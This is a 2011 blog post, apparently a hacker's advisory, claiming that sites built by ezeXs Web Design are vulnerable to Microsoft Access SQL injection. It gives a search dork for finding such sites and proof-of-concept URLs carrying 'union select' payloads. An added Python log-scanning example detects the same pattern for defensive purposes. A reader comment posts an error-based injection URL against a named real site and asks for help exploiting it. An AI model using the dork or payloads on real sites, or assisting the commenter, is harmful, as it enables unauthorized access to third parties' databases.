Friday, April 15, 2011

ezeXs Web Design Vulnerable to SQL Injection


Title : ezeXs Web Design Vulnerable to SQL Injection
Web : http://www.ezexs.com/
By : p0pc0rn
Dork : intext:"Powered by ezexs.com"


Microsoft Access SQL Injection
------------------------------

http://site.com/[type].asp?[id]=[SQL]

Note : All parameters are injectable.

POC
---

http://site.com/product_detail.asp?Id=57 union select 1 from test.a
http://site.com/category.asp?Id=49 union select 1 from test.a



more out there.

thanks,
-p0pc0rn-
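
Added example, not part of the original advisory: a log check for the request pattern shown in the POC. It goes slightly beyond the `union select` case by flagging any `.asp` request where a parameter expected to be an integer key carries anything other than digits. The log lines are constructed, and the parameter names in `NUMERIC_PARAMS` are an assumption about the application.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C log lines (not from the advisory); 192.0.2.0/24 is a
# documentation address range.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-04-15 10:00:01 192.0.2.10 GET /product_detail.asp Id=57 200
2011-04-15 10:00:05 192.0.2.77 GET /product_detail.asp Id=57+union+select+1+from+test.a 500
2011-04-15 10:00:09 192.0.2.77 GET /category.asp Id=49%20union%20select%201%20from%20test.a 500
2011-04-15 10:00:12 192.0.2.10 GET /category.asp Id=49&page=2 200
2011-04-15 10:00:20 192.0.2.10 GET /search.asp q=union+jack+flag 200
"""

# Assumption: these query parameters are integer keys in the application.
NUMERIC_PARAMS = {"id", "page"}
# Used only to label a hit; the decision itself is "not all digits".
SQL_WORDS = re.compile(r"\b(union|select|from|where|convert)\b|--|'", re.I)


def suspicious_requests(log_text):
    """Return (client_ip, page, param, decoded_value, label) for every .asp
    request whose integer parameter carries anything other than digits."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for later rows
            continue
        if not line.strip() or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        page = rec.get("cs-uri-stem", "")
        if not page.lower().endswith(".asp"):
            continue
        # parse_qsl decodes %20 and '+' so both encodings compare equal.
        for name, value in parse_qsl(rec.get("cs-uri-query", ""), keep_blank_values=True):
            if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
                label = "sql-keywords" if SQL_WORDS.search(value) else "non-numeric"
                hits.append((rec.get("c-ip"), page, name, value, label))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Keying the rule on the parameter's expected type rather than on keywords alone keeps the `search.asp` request, which legitimately contains the word "union", out of the results.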

1 comment:

fahad said...

thanks man but I can't exploit, look

http://www.bjkdost.org/veri/haber/devam.asp?haber_id=569%201%20or%201=convert%28int,%28db_name%29%29--

please show explain exploit the site :(



:$